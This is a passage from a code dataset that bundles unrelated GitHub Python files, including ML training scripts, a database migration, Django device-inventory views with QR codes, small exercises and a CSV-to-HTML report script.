std3])\ncb_index_create()\nt4, std4 = query_time(q1, n)\nt5, std5 = query_time(q2, n)\nt6, std6 = query_time(q3, n)\ntimes_idx = np.array([t4, t5, t6])\nstd_idx = np.array([std4, std5, std6])\n\n# visualize\nind = np.arange(len(times_noidx)) # the x locations for the groups\nwidth = 0.35 # the width of the bars\n\nfig, ax = plt.subplots()\nrects1 = ax.bar(ind - width/2, times_noidx, width,\n yerr=std_noidx, label='No Index')\nrects2 = ax.bar(ind + width/2, times_idx, width, yerr=std_idx, label='Index')\n\n# Add some text for labels, title and custom x-axis tick labels, etc.\nax.set_ylabel('times in ms')\nax.set_title('times with and without index in ms')\nax.set_xticks(ind)\nax.set_xticklabels(('Q1', 'Q2', 'Q3'))\nax.legend()\n\n\ndef autolabel(rects, xpos='center'):\n ha = {'center': 'center', 'right': 'left', 'left': 'right'}\n offset = {'center': 0, 'right': 1, 'left': -1}\n\n for rect in rects:\n height = rect.get_height()\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(offset[xpos]*3, 3), # use 3 points offset\n textcoords=\"offset points\", # in both directions\n ha=ha[xpos], va='bottom')\n\n\nautolabel(rects1, \"left\")\nautolabel(rects2, 
\"right\")\n\nfig.tight_layout()\n\nplt.show(block=True)\n","repo_name":"maxneuds/big_data_technologies","sub_path":"praktikum_03/compare_cb.py","file_name":"compare_cb.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31405406246","text":"\"\"\"updated relationship between user and comments\n\nRevision ID: e0090fc2c42a\nRevises: e5742ca32d04\nCreate Date: 2021-12-14 16:25:24.026791\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'e0090fc2c42a'\ndown_revision = 'e5742ca32d04'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('comments', sa.Column('user_id', sa.Integer(), nullable=False))\n op.create_foreign_key(None, 'comments', 'users', ['user_id'], ['id'])\n op.alter_column('posts', 'createdAt',\n existing_type=postgresql.TIMESTAMP(),\n nullable=True)\n op.alter_column('posts', 'updatedAt',\n existing_type=postgresql.TIMESTAMP(),\n nullable=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('posts', 'updatedAt',\n existing_type=postgresql.TIMESTAMP(),\n nullable=False)\n op.alter_column('posts', 'createdAt',\n existing_type=postgresql.TIMESTAMP(),\n nullable=False)\n op.drop_constraint(None, 'comments', type_='foreignkey')\n op.drop_column('comments', 'user_id')\n # ### end Alembic commands ###\n","repo_name":"span9692/Soundbook","sub_path":"migrations/versions/20211214_162524_updated_relationship_between_user_and_.py","file_name":"20211214_162524_updated_relationship_between_user_and_.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"16409667856","text":"# Day_25_02_BreastCancer.py\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn import model_selection, preprocessing\n\n# 문제 1\n# breast-cancer-wisconsin 데이터를\n# x_train, x_test, y_train, y_test로 반환하는 함수를 만드세요\n\n# 문제 2\n# 97.5% 수준의 정확도를 갖는 모델을 구축하세요 (앙상블 적용)\n\n\ndef get_data():\n # 1. Sample code number id number\n # 2. Clump Thickness 1 - 10\n # 3. Uniformity of Cell Size 1 - 10\n # 4. Uniformity of Cell Shape 1 - 10\n # 5. Marginal Adhesion 1 - 10\n # 6. Single Epithelial Cell Size 1 - 10\n # 7. Bare Nuclei 1 - 10\n # 8. Bland Chromatin 1 - 10\n # 9. Normal Nucleoli 1 - 10\n # 10. Mitoses 1 - 10\n # 11. Class: (2 for benign, 4 for malignant)\n names = ['code', 'Clump', 'Size', 'Shape', 'Adhesion',\n 'Epithelial', 'Nuclei', 'Chromatin', 'Nucleoli',\n 'Mitoses', 'Class']\n bc = pd.read_csv('data/breast-cancer-wisconsin.data',\n header=None,\n names=names)\n print(bc)\n bc.info()\n\n counts = bc.Nuclei.value_counts()\n print(counts)\n\n most_freq = counts.index[0]\n\n # print(bc[6])\n # bc.drop([6], axis=1, inplace=True)\n\n enc = preprocessing.LabelEncoder()\n y = enc.fit_transform(bc['Class'])\n y = y.reshape(-1, 1)\n y = np.float32(y) # int -> float\n\n nuclei = bc.Nuclei.values\n print(type(nuclei), nuclei.dtype)\n print(nuclei[:5])\n print(set(nuclei))\n print(np.unique(nuclei))\n\n # 2번\n # equals = (nuclei == '?') # [False True True ... False]\n # nuclei[nuclei == '?'] = '0'\n nuclei[nuclei == '?'] = str(most_freq)\n nuclei = np.int64(nuclei)\n print(np.unique(nuclei))\n\n # 1번\n # temp = [i if i != '?' else '0' for i in nuclei]\n # temp = np.int64(temp)\n # print(np.unique(temp))\n\n # print(bc.Nuclei)\n bc.drop(['code', 'Nuclei', 'Class'], axis=1, inplace=True)\n\n # 1번\n # bc['Nuclei'] = temp\n # bc.info()\n\n x = bc.values\n\n # 2번\n x = np.hstack([x, nuclei.reshape(-1, 1)])\n print(x.shape, y.shape) # (699, 8) (699, 1)\n print(x.dtype)\n\n return model_selection.train_test_split(x, y, train_size=0.7)\n\n\ndef show_accuracy(preds, labels):\n preds = preds.reshape(-1)\n\n bools = np.int32(preds > 0.5)\n y_bools = np.int32(labels.reshape(-1))\n\n print('acc :', np.mean(bools == y_bools))\n\n\ndef model_breast_cancer_missing(x_train, x_test, y_train, y_test):\n name = 'w' + str(np.random.rand(1)[0])\n w = tf.get_variable(name, shape=[x_train.shape[1], 1],\n initializer=tf.glorot_uniform_initializer)\n b = tf.Variable(tf.zeros([1]))\n\n ph_x = tf.placeholder(tf.float32)\n\n z = tf.matmul(ph_x, w) + b\n hx = tf.sigmoid(z)\n\n loss_i = tf.nn.sigmoid_cross_entropy_with_logits(\n labels=y_train, logits=z)\n loss = tf.reduce_mean(loss_i)\n\n # optimizer = tf.train.GradientDescentOptimizer(0.0003)\n optimizer = tf.train.AdamOptimizer(0.1)\n # optimizer = tf.train.RMSPropOptimizer(0.001)\n train = optimizer.minimize(loss)\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n for i in range(1000):\n sess.run(train, {ph_x: x_train})\n\n # if i % 10 == 0:\n # print(i, sess.run(loss, {ph_x: x_train}))\n\n preds = sess.run(hx, {ph_x: x_test})\n show_accuracy(preds, y_test)\n\n sess.close()\n\n return preds\n\n\nx_train, x_test, y_train, y_test = get_data()\n\nresults = np.zeros(y_test.shape)\nfor i in range(7):\n preds = model_breast_cancer_missing(x_train, x_test, y_train, y_test)\n results += preds\n\nprint('-' * 30)\nshow_accuracy(results / 7, 
y_test)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yunhui21/CB_Ai_NLP","sub_path":"WeedDay/Day_25_02_BreastCancer.py","file_name":"Day_25_02_BreastCancer.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"20533881538","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import init\nfrom torch.autograd import Variable\n\ndef weights_init_normal(m):\n classname = m.__class__.__name__\n\n if classname.find('Conv') != -1:\n init.normal(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm2d') != -1:\n init.normal(m.weight.data, 1.0, 0.02)\n init.constant(m.bias.data, 0.0)\n\ndef init_weights(net):\n print('Initializing...')\n net.apply(weights_init_normal)\n\nclass ResnetBlock(nn.Module):\n def __init__(self, dim):\n super(ResnetBlock, self).__init__()\n self.conv_block = self.build_conv_block(dim)\n\n def build_conv_block(self, dim):\n conv_block = []\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=1),\n nn.BatchNorm2d(dim),\n nn.ReLU(True)]\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=1),\n nn.BatchNorm2d(dim)]\n return nn.Sequential(*conv_block)\n\n def forward(self, x):\n out = x + self.conv_block(x)\n return out\n\nclass ResnetGenerator(nn.Module):\n def __init__(self, input_nc, output_nc, ngf=64, n_blocks=6):\n assert (n_blocks >= 0)\n super(ResnetGenerator, self).__init__()\n self.input_nc = input_nc\n self.output_nc = output_nc\n self.ngf = ngf\n\n model = []\n model += [nn.Conv2d(input_nc, ngf, kernel_size=7, padding=3),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True)]\n model += [nn.Conv2d(ngf, ngf * 2, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True)]\n model += [nn.Conv2d(ngf * 2, ngf * 4, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True)]\n\n for i in range(n_blocks):\n model += [ResnetBlock(ngf * 4)]\n\n model += [nn.ConvTranspose2d(ngf * 4, ngf * 2, kernel_size=3, stride=2, padding=1, output_padding=1),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True)]\n model += [nn.ConvTranspose2d(ngf * 2, ngf, kernel_size=3, stride=2, padding=1, output_padding=1),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True)]\n\n model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=3)]\n model += [nn.Tanh()]\n\n self.model = nn.Sequential(*model)\n\n def forward(self, x):\n return self.model(x)\n\nclass Discriminator(nn.Module):\n def __init__(self, input_nc, ndf=64):\n super(Discriminator, self).__init__()\n\n model = []\n model += [nn.Conv2d(input_nc, ndf, kernel_size=4, stride=2, padding=1),\n nn.LeakyReLU(0.2, True)]\n\n model += [nn.Conv2d(ndf, ndf * 2, kernel_size=4, stride=2, padding=1),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, True)]\n model += [nn.Conv2d(ndf * 2, ndf * 4, kernel_size=4, stride=2, padding=1),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, True)]\n model += [nn.Conv2d(ndf * 4, ndf * 8, kernel_size=4, stride=1, padding=1),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, True)]\n\n model += [nn.Conv2d(ndf * 8, 1, kernel_size=4, stride=1, padding=1)]\n\n self.model = nn.Sequential(*model)\n\n def forward(self, x):\n #x = torch.cat([x, label], 1)\n return self.model(x)\n\n# GANLoss\nclass GANLoss(nn.Module):\n def __init__(self, target_real_label=1.0, target_fake_label=0.0, tensor=torch.FloatTensor):\n super(GANLoss, self).__init__()\n self.real_label = target_real_label\n self.fake_label = target_fake_label\n self.real_label_var = None\n self.fake_label_var = None\n self.Tensor = tensor\n #self.loss = nn.MSELoss()\n #self.loss = nn.BCELoss()\n self.loss = nn.BCEWithLogitsLoss()\n\n def get_target_tensor(self, input, target_is_real):\n target_tensor = None\n if target_is_real:\n create_label = ((self.real_label_var is None) or\n (self.real_label_var.numel() != input.numel()))\n if 
create_label:\n real_tensor = self.Tensor(input.size()).fill_(self.real_label)\n self.real_label_var = Variable(real_tensor, requires_grad=False)\n target_tensor = self.real_label_var\n else:\n create_label = ((self.fake_label_var is None) or\n (self.fake_label_var.numel() != input.numel()))\n if create_label:\n fake_tensor = self.Tensor(input.size()).fill_(self.fake_label)\n self.fake_label_var = Variable(fake_tensor, requires_grad=False)\n target_tensor = self.fake_label_var\n return target_tensor\n\n def __call__(self, input, target_is_real):\n target_tensor = self.get_target_tensor(input, target_is_real)\n return self.loss(input, target_tensor)","repo_name":"yangtian62/pix2pix-pytorch","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23441497319","text":"import datetime\n\n\nclass BlobPaths(object):\n\n @staticmethod\n def split_filename(filename: str):\n \"\"\" see test cases for all handled edge cases \"\"\"\n if not filename:\n return '', ''\n\n ext = ''\n name = ''\n parts = filename.split('.')\n if len(parts) == 1:\n return filename, ''\n if parts[0] == '':\n parts.pop(0)\n parts[0] = '.' + parts[0]\n if len(parts) > 1:\n ext = '.' + parts.pop()\n if ext.find('/') > 0:\n ext = ext.lstrip('.')\n parts.append(ext)\n ext = ''\n name = '.'.join(parts)\n if ext == '.':\n name = ''\n return name, ext\n\n @staticmethod\n def get_parts(path_string: str):\n if not path_string:\n raise ValueError('get_parts: path_string must have a value')\n\n parts = str(path_string).split('/')\n bucket = parts.pop(0)\n name, ext = BlobPaths.split_filename(parts.pop())\n path = '/'.join(parts) + '/'\n return bucket, path, name, ext\n\n @staticmethod\n def build_path(path: str, date: datetime.date = None):\n\n if not date:\n date = datetime.datetime.now()\n\n if not path:\n raise ValueError('build_path: path must have a value')\n if not path[0] == '/':\n path_string = path.lstrip('/')\n else:\n path_string = path\n\n path_string = path_string.replace('%date', '%Y-%m-%d')\n path_string = path_string.replace('%time', '%H%M%S')\n\n path_string = date.strftime(path_string)\n\n return path_string\n","repo_name":"joocer/orwell","sub_path":"orwell/helpers/blob_paths.py","file_name":"blob_paths.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"27571236344","text":"\"\"\"\nconvert Jekyll posts to Hugo posts\n\nThis is since `hugo import jekyll` just seems broken, even for Hugo 0.54\n\nUsage example:\n\n python jekyll2hugo.py ~/myJekyllSite/_posts ~/myHugoSite/content/blog\n\"\"\"\nfrom argparse import ArgumentParser\nfrom pathlib import Path\nimport hugomd\n\n\np = ArgumentParser()\np.add_argument(\"jekyll_posts_dir\", help=\"path to Jekyll _posts directory\")\np.add_argument(\"out_dir\", help=\"directory to write converted Hugo posts\")\np.add_argument(\"-nofix\", help=\"do not fix bad characters (Hugo might fail)\", action=\"store_true\")\np.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\np = p.parse_args()\n\ninpath = Path(p.jekyll_posts_dir).expanduser()\nif not inpath.is_dir():\n raise NotADirectoryError(inpath)\n\noutdir = Path(p.out_dir).expanduser()\noutdir.mkdir(parents=True, exist_ok=True)\n\njlist = inpath.rglob(\"*.md\")\nfor jfn in jlist:\n hfn = hugomd.post2hugo(jfn, outdir, not p.nofix)\n if p.verbose and hfn:\n print(jfn, \"=>\", hfn)\n","repo_name":"scivision/hugo-utils","sub_path":"src/hugomd/jekyll2hugo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23183633921","text":"'''\nConsider the fraction, n/d, where n and d are positive integers. If n= ageMin) and (ageMax is None or frame.age <= ageMax):\n # get list of balls\n balls = frame.data[self.agent][\"BALLS\"].value\n t = frame.age\n (x, y, z, vx, vy, vz, conf) = (None, None, None, None, None, None, None)\n if len(balls) > 0:\n ball = balls[0]\n x = ball[0][0]\n y = ball[0][1]\n z = ball[0][2]\n vx = ball[1][0]\n vy = ball[1][1]\n vz = ball[1][2]\n conf = ball[2]\n # TODO compress\n result.insert('x', t, x)\n result.insert('y', t, y)\n result.insert('z', t, z)\n result.insert('vx', t, vx)\n result.insert('vy', t, vy)\n result.insert('vz', t, vz)\n result.insert('conf', t, conf)\n return result\n \n def obstacleStatsBetweenAge(self, ageMin = None, ageMax = None):\n result = defaultdict(lambda: MultiSeries())\n for frame in self.rdl.frames:\n if (ageMin is None or frame.age >= ageMin) and (ageMax is None or frame.age <= ageMax):\n for obst in frame.data[self.agent][\"OBSTACLES\"].value:\n t = frame.age\n ((x, y), (vx, vy), conf, id) = obst\n result[id].insert('x', t, x)\n result[id].insert('y', t, y)\n result[id].insert('vx', t, vx)\n result[id].insert('vy', t, vy)\n result[id].insert('conf', t, conf)\n return result\n\n def obstacleStatsBetweenAge(self, ageMin = None, ageMax = None):\n result = defaultdict(lambda: MultiSeries())\n for frame in self.rdl.frames:\n if (ageMin is None or frame.age >= ageMin) and (ageMax is None or frame.age <= ageMax):\n for obst in frame.data[self.agent][\"OBSTACLES\"].value:\n t = frame.age\n ((x, y), (vx, vy), conf, id) = obst\n result[id].insert('x', t, x)\n result[id].insert('y', t, y)\n result[id].insert('vx', t, vx)\n result[id].insert('vy', t, vy)\n result[id].insert('conf', t, conf)\n return result\n\n def framesBetweenAge(self, ageMin, ageMax):\n return [frame for frame in self.rdl.frames if frame.age >= ageMin and frame.age <= ageMax]\n \n\n","repo_name":"Falcons-Robocup/code","sub_path":"packages/worldModel/tst/WorldModelAnalyzer.py","file_name":"WorldModelAnalyzer.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"25785520120","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.utils.dateformat import DateFormat\nfrom .forms import FormCadastroDispositivo\nfrom .models import CadastroDispositivo, QRCode\nfrom django.http import HttpResponse\nfrom django.core.files.storage import default_storage\nfrom django.core.files.base import ContentFile\nfrom io import BytesIO\nfrom django.urls import reverse\nfrom departamento.models import Sala\nfrom falha.models import Manutencao, Falha\nfrom falha.forms import FormManutencao, FalhaForm\nimport qrcode\nimport base64\nimport random\nimport string\nfrom django.contrib.auth.decorators import login_required\nfrom home.decorator import user_has_permission\n\ndef gerar_protocolo(length=6):\n caracteres_permitidos = string.ascii_uppercase + string.digits\n protocolo = ''.join(random.choice(caracteres_permitidos) for _ in range(length))\n return protocolo\n\n@login_required\n@user_has_permission('dispositivo.add_cadastrodispositivo')\ndef cadastro_dispositivo(request):\n salas = Sala.objects.all()\n if request.method == 'POST':\n form = FormCadastroDispositivo(request.POST)\n if form.is_valid():\n novo_dispositivo = form.save()\n \n ip = request.META.get('REMOTE_ADDR')\n porta = request.META.get('SERVER_PORT')\n custom_domain = f\"http://{ip}:{porta}\"\n \n qr = qrcode.QRCode(version=1, error_correction=qrcode.constants.ERROR_CORRECT_L, box_size=10, border=4)\n detalhes_url = reverse('detalhes_dispositivo', args=[novo_dispositivo.id])\n full_url = f\"{custom_domain}{detalhes_url}\"\n qr.add_data(full_url)\n qr.make(fit=True)\n print(full_url)\n \n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\n buffer = BytesIO()\n img.save(buffer, format=\"PNG\")\n \n qr_code_base64 = base64.b64encode(buffer.getvalue()).decode('utf-8')\n \n file_name = f'qrcodes/qrcode_{novo_dispositivo.id}.png'\n default_storage.save(file_name, ContentFile(buffer.getvalue()))\n novo_dispositivo.qr_code = file_name\n novo_dispositivo.save()\n qr_code_obj = QRCode(dispositivo=novo_dispositivo, qr_code_base64=qr_code_base64)\n qr_code_obj.save()\n \n print(\"Novo dispositivo salvo com sucesso:\", novo_dispositivo)\n return render(request, 'dispositivo/popup_qr_code.html', {'dispositivo': novo_dispositivo})\n else:\n print(\"Erros no formulário:\", form.errors)\n else:\n form = FormCadastroDispositivo()\n return render(request, 'dispositivo/cadastro_dispositivo.html', {'form': form, 'salas': salas})\n\n@login_required\n@user_has_permission('dispositivo.change_cadastrodispositivo')\ndef editar_dispositivo(request, dispositivo_id):\n dispositivo = get_object_or_404(CadastroDispositivo, pk=dispositivo_id)\n if request.method == 'POST':\n form = FormCadastroDispositivo(request.POST, instance=dispositivo)\n if form.is_valid():\n form.save()\n return redirect('listar_dispositivos_e_falhas')\n else:\n df = DateFormat(dispositivo.data_aquisicao)\n dispositivo.data_aquisicao = df.format('Y-m-d')\n form = dispositivo\n return render(request, 'dispositivo/editar_dispositivo.html', {'form': form})\n\n@login_required\n@user_has_permission('dispositivo.delete_cadastrodispositivo')\ndef excluir_dispositivo(request, dispositivo_id):\n dispositivo = get_object_or_404(CadastroDispositivo, pk=dispositivo_id)\n if request.method == 'POST':\n dispositivo.delete()\n return redirect('listar_dispositivos_e_falhas')\n return render(request, 'dispositivo/excluir_dispositivo.html', {'dispositivo': 
dispositivo})\n\n@login_required\n@user_has_permission('dispositivo.view_cadastrodispositivo')\ndef listar_dispositivos_e_falhas(request):\n dispositivos = CadastroDispositivo.objects.all()\n return render(request, 'dispositivo/listar_dispositivos_e_falhas.html', {'dispositivos': dispositivos})\n\n@login_required\n@user_has_permission('dispositivo.view_cadastrodispositivo')\ndef detalhes_dispositivo(request, dispositivo_id):\n dispositivo = CadastroDispositivo.objects.get(pk=dispositivo_id)\n qr_code_obj = QRCode.objects.get(dispositivo=dispositivo)\n falhas = Falha.objects.filter(dispositivo=dispositivo)\n manutencoes = Manutencao.objects.filter(falha__dispositivo=dispositivo)\n if request.method == 'POST':\n falha_form = FalhaForm(request.POST, prefix='falha')\n manutencao_form = FormManutencao(request.POST, prefix='manutencao')\n if falha_form.is_valid():\n nova_falha = falha_form.save(commit=False)\n nova_falha.dispositivo = dispositivo\n nova_falha.save()\n falha_form = FalhaForm()\n elif manutencao_form.is_valid():\n nova_manutencao = manutencao_form.save(commit=False)\n nova_manutencao.dispositivo = dispositivo\n nova_manutencao.save()\n manutencao_form = FormManutencao()\n else:\n falha_form = FalhaForm(prefix='falha')\n manutencao_form = FormManutencao(prefix='manutencao')\n context = {\n 'dispositivo': dispositivo,\n 'qr_code_obj': qr_code_obj,\n 'falhas': falhas,\n 'falha_form': falha_form,\n 'manutencoes': manutencoes,\n 'manutencao_form': manutencao_form\n }\n return render(request, 'dispositivo/detalhes_dispositivo.html', context)\n\n@login_required\ndef imprimir_qr_code(request, dispositivo_id):\n dispositivo = get_object_or_404(CadastroDispositivo, pk=dispositivo_id)\n qr_code_obj = QRCode.objects.get(dispositivo=dispositivo)\n qr_code_image = base64.b64decode(qr_code_obj.qr_code_base64.encode('utf-8'))\n response = HttpResponse(qr_code_image, content_type='image/png')\n response['Content-Disposition'] = f'attachment; filename=\"qrcode_dispositivo_{dispositivo_id}.png\"'\n return response\n","repo_name":"IgorMiranda267/Sistema-Web","sub_path":"crud/dispositivo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"4466097351","text":"# Write a program that receives a sequence of numbers (integers) separated by a single space. \n# It should print a list of only the even numbers. Use filter().\n\n\ndef sorting(nums):\n nums = sorted(nums)\n return nums\n\n\nnumbers = [int(el) for el in input().split()]\nprint(sorting(numbers))\n","repo_name":"boyan-petkov/Python","sub_path":"Fundamentals/Lab and Exercises/Functions - Exercise/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15696032375","text":"import os\nfrom containers import *\n\nfrom time import sleep\n# import sys\ndef title(): \n os.system('clear')\n os.system('tput setaf 4') # color blue\n print('Welcome to flash inteface'.center(os.get_terminal_size().columns))\n os.system('tput sgr0') # reset color\n\ndef exitProtocol():\n print('Exiting. . .')\n sleep(0.4)\n os.system('clear')\n exit()\n\ndef menuOne():\n return int(input(''' choose from these options:\n [1] Container Operations\n [2] Newtorking Opetations\n [3] User Modifications\n [4] Web-Server Options\n [5] Miscellaneous\n [0] exit\\n'''))\n \n\nwhile True:\n title()\n oneAns = menuOne() \n if (oneAns == 0): # zero is the exit protocol\n exitProtocol()\n elif (oneAns == 1):\n os.system('clear')\n while True:\n try:\n if container(containerOption()):\n pass\n else:\n break\n input('press any key to continue..')\n os.system('clear') \n except ValueError: \n os.system('clear') \n continue\n else:\n print('you have choosen: {0}'.format(oneAns))\n print('test')\n input()\n os.system('clear')\n","repo_name":"smc181002/rhel_tui","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17659205043","text":"import sys\nimport csv\n\nfile_name = sys.argv[1]\n\narray_of_data = []\nset_to_count_num_of_devices = set()\nlist_from_entry_to_temperature = []\ndict = {}\nmax_temperature = 0\nnum_of_card = 0 # equals to length of resulting list\nhottest_card_or_device = \"\"\nlist_of_output_table = []\n\nwith open(file_name) as file:\n csv_reader_object = csv.reader(file)\n for row in csv_reader_object:\n if row[0] == \"Device;Card;Temperature\":\n print(\" \")\n else:\n list_of_each_row = row[0].split(\";\")\n # max temperature check\n if max_temperature < int(list_of_each_row[2]): # assumme temperature is integer\n max_temperature = int(list_of_each_row[2])\n hottest_card_or_device = list_of_each_row[1] + \"/\" + list_of_each_row[0]\n\n array_of_data.append(list_of_each_row)\n if list_of_each_row[0] in set_to_count_num_of_devices:\n temp_list = dict[list_of_each_row[0]]\n temp_list[0] = temp_list[0] + 1\n if int(list_of_each_row[2]) >= 70:\n temp_list[1] = temp_list[1] + 1\n if temp_list[2] < int(list_of_each_row[2]):\n temp_list[2] = int(list_of_each_row[2])\n\n temp_list[3] = temp_list[3] + int(list_of_each_row[2]) # average temp\n dict[list_of_each_row[0]] = temp_list\n else:\n set_to_count_num_of_devices.add(list_of_each_row[0])\n temp_list = [1]\n if int(list_of_each_row[2]) >= 70:\n temp_list.append(1)\n else:\n temp_list.append(0)\n temp_list.append(int(list_of_each_row[2])) # max temp\n temp_list.append(int(list_of_each_row[2])) # average\n dict[list_of_each_row[0]] = temp_list\n\nfor i in dict:\n avg_temp = dict[i][3] // dict[i][0]\n temp_list = dict[i]\n temp_list[3] = avg_temp\n dict[i] = temp_list\n\n# FInd total devices, total cards , max card temperature, hottest card/device\nnum_of_devices = len(set_to_count_num_of_devices)\nnum_of_card = len(array_of_data)\n\n\nanalytics_list = [str(num_of_devices), str(num_of_card), str(max_temperature), hottest_card_or_device]\n\nmylist = []\nfor i in dict:\n tmp_ls = [i]\n tmp_ls.extend(dict[i])\n mylist.append(tmp_ls)\n\n\noutput_name_ls = file_name.split(\".\")\noutput_file = output_name_ls[0]+\".html\"\nf = open(output_file, 'w')\n\n\n\ndef html_table(lol, analytics_list_for_html_creation):\n f.write(\"Summary\")\n f.write(\"